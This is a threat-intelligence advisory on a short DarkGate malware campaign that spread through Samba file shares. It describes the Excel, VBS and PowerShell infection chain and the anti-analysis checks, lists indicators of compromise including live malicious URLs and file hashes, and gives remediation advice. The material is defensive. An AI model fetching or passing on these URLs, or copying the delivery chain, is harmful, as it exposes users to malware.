ICS: Multiple Rockwell Automation FactoryTalk Vulnerabilities
July 16, 2024LockBit Ransomware – Active IOCs
July 16, 2024ICS: Multiple Rockwell Automation FactoryTalk Vulnerabilities
July 16, 2024LockBit Ransomware – Active IOCs
July 16, 2024Severity
High
Analysis Summary
A brief DarkGate malware campaign that used Samba file shares to spread infections has recently been brought to light by cybersecurity researchers.
According to the researchers, the activity took place between March and April of 2024. The infection chains used servers that were public-facing Samba file shares that hosted JavaScript and Visual Basic Script (VBS) files. North America, Europe, and portions of Asia were among the targets. This campaign, which was only around for a short while, shows how threat actors can ingeniously misuse trustworthy resources to spread malware.
After appearing in 2018, DarkGate has developed into a malware-as-a-service (MaaS) provider that only a limited number of users can access. It can generate bitcoin, run code remotely, take over compromised hosts, start reverse shells, and drop more payloads. Malware attacks have increased significantly in recent months, especially after the QakBot infrastructure was taken down by international law enforcement in August 2023.
Beginning with Microsoft Excel (.xlsx) files, the campaign prompts targets to click on an embedded “Open” button, which downloads and launches VBS code stored on a Samba file share. An AutoHotKey-based DarkGate package is downloaded utilizing the PowerShell script, which is set up to acquire and run another PowerShell script. The follow-up PowerShell script is also designed to be downloaded and executed by alternate sequences that use JavaScript files rather than VBS.
To obstruct analysis, DarkGate operates by searching for different anti-malware applications and examining CPU statistics to ascertain if it is operating on a real host or a virtual one. To find out whether reverse engineering tools, debuggers, or virtualization software are present, it also looks at the host's active processes.
Unencrypted HTTP requests are used in DarkGate C2 traffic, but the data is obfuscated and appears as text encoded with Base64. As DarkGate continues to adapt and refine its techniques of penetration and resistance to investigation, it is a poignant reminder of the necessity for comprehensive and proactive cybersecurity defenses.
Impact
- Remote Code Execution
- Information Theft
Indicators of Compromise
URL
- http://adfhjadfbjadbfjkhad44jka.com/aa
- http://nextroundst.com/ffcxlohx
- http://diveupdown.com/yhmrmmgc
MD5
- 7efe9f3902618e160caafb1f6fd73dd6
- e9da2f1fbf627a05811cf294a1136a64
- 633338dfab9b05206f29a5de22d46c08
- 077fe8bca2d1fade3443cea809c54582
- 44ecae0d48874f5fa0b97b433810ca69
- fd00d405443adc930b478198e3cb4957
- b6aa40319424b9eadffc98edd2ce1b32
- d6b574fe5073f9b8861ee0ec19cd52cf
- 36facbff66a7fd971b82a6ebc5bfb6ab
- ebef8e8a9eab076bafc70d7a6b2170a2
SHA-256
- 378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7
- ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9
- a01672db8b14a2018f760258cf3ba80cda6a19febbff8db29555f46592aedea6
- 02acf78048776cd52064a0adf3f7a061afb7418b3da21b793960de8a258faf29
- 4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503
- 08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba
- 585e52757fe9d54a97ec67f4b2d82d81a547ec1bd402d609749ba10a24c9af53
- 51f1d5d41e5f5f17084d390e026551bc4e9a001aeb04995aff1c3a8dbf2d2ff3
- 44a54797ca1ee9c896ce95d78b24d6b710c2d4bcb6f0bcdc80cd79ab95f1f096
- b28473a7e5281f63fd25b3cb75f4e3346112af6ae5de44e978d6cf2aac1538c1
SHA-1
- 8f1a3560307e848a01122d088d9136e545726ca8
- 792924ff455d06257c226f7f276d8776389b0b5a
- 04710e765ce6d2342e8b2af733dd80e61a8fafca
- a7d489569cad56aa7c0cc29aa5c4b64d517dfa85
- 9cdd49aa1092af746f22f0e89fe23b0351814666
- 61d9b3a99c471276aa010f081f0637f7fb94e8cd
- 9c63e662cd6d476ea3f4c3f9be052aff98ca81ae
- 0e6f577cf8d9b7f7eff1292965c6f9b695d4fd0b
- 76f62f5d5dc7ac29e070c6faf48e22e88b16bb63
- 5fbd7290f6a6dbdf823d8d1e5a3907c5878548b8
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement multi-factor authentication to add an extra layer of security to login processes.
- Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
- Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
- Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
- Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
- Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
- Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
- Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
- Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.